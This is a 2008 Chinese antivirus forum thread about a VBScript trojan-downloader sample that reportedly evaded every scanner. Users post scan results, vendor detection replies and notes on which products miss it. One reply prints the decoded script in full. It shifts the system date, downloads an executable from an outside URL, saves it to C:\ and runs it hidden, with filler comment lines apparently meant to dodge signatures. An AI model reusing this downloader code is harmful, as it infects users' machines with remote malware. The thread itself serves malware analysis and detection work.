目前過全部的殺軟

显示全部楼层 · 发表于 2008-4-22 20:31:08

一個樣本，目前過全部的殺軟!!!
大家測看看!!!

結果: 0/32 (0%)

File ID	Filename	Size (Byte)	Result
3826737	台北掃黃紀要.zip	7.54 KB	OK

A listing of files contained inside archives alongside their results can be found below:

File ID	Filename	Size (Byte)	Result
3826738	#x#_#######n.vbe	154.18 KB	MALWARE

Please find a detailed report concerning each individual sample below:

Filename	Result
#x#_#######n.vbe	MALWARE

The file '#x#_#######n.vbe' has been determined to be 'MALWARE'.
Our analysts named the threat VBS/Dldr.Agent.GA. The term "VBS/" denotes a Visual Basic script-virus.Detection will be added to our virus definition file (VDF) with one of the next updates.

[ 本帖最后由 juijui 于 2008-4-22 20:34 编辑 ]

显示全部楼层 · 发表于 2008-4-22 20:32:06

报过，我就不上报。

显示全部楼层 · 发表于 2008-4-22 20:33:15

ao~

[ 本帖最后由 diablolong 于 2008-4-23 21:23 编辑 ]

显示全部楼层 · 发表于 2008-4-22 20:38:28

是病毒吗？运行有什么危害？（此文件后缀是VBS的，毒霸没有查出）

[ 本帖最后由 hellobaby 于 2008-4-22 20:43 编辑 ]

显示全部楼层 · 发表于 2008-4-22 20:40:22

rising20.41.12未杀！

显示全部楼层 · 发表于 2008-4-22 21:03:41

on error resume next
Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c set date=%date% &&date 2008-4-20 &&ping 127.0.0.1 -n 29 &&date %date%",vbhide
ps.Name="hfgty.exe" or ps.Name="4451y.exe" or ps.name="gfhftr.exe" or ps.name="86231.exe" or ps.name="dhfgh4.exe" or ps.name="dfghgfy575.exe"
iLocal = LCase("c:\fgtyt.exe"):iRemote = LCase("http://www.13806999228.com/31.exe")
'if 1=2 then Wscript.echo "iMPossible!"
wscript.sleep 2
'if 1=2 then Wscript.echo "iMPossible!"
Set xPost = CreateObject("Microsoft.XMLHTTP")
'if 1=2 then Wscript.echo "iMPossible!"
xPost.Open "GET",iRemote,0
'if 1=2 then Wscript.echo "iMPossible!"
xPost.Send()
'if 1=2 then Wscript.echo "iMPossible!"
Set sGet = CreateObject("ADODB.Stream")
'if 1=2 then Wscript.echo "iMPossible!"
sGet.Mode = 3
'if 1=2 then Wscript.echo "iMPossible!"
sGet.Type = 1
'if 1=2 then Wscript.echo "iMPossible!"
sGet.Open()
'if 1=2 then Wscript.echo "iMPossible!"
sGet.Write(xPost.responseBody)
'if 1=2 then Wscript.echo "iMPossible!"
sGet.SaveToFile iLocal,2
'if 1=2 then Wscript.echo "iMPossible!"
Set Runner=CreateObject("Wscript.Shell")
'if 1=2 then Wscript.echo "iMPossible!"
Runner.run iLocal

复制代码

显示全部楼层 · 发表于 2008-4-22 23:02:49

Hello,

yexye_-#Lm#nn.vbe - Trojan-Downloader.VBS.Agent.mt

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Evgeny Aseev
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.

> Attachment: ??????.zip
[:1:]

显示全部楼层 · 发表于 2008-4-22 23:51:02

nod32 卡巴均不报

显示全部楼层 · 发表于 2008-4-22 23:59:12

试了下 avk 蜘蛛 NOD 红伞 avg 都未报

显示全部楼层 · 发表于 2008-4-23 00:53:27

卡巴飘~

[病毒样本] 目前過全部的殺軟

本帖子中包含更多资源

评分

2/0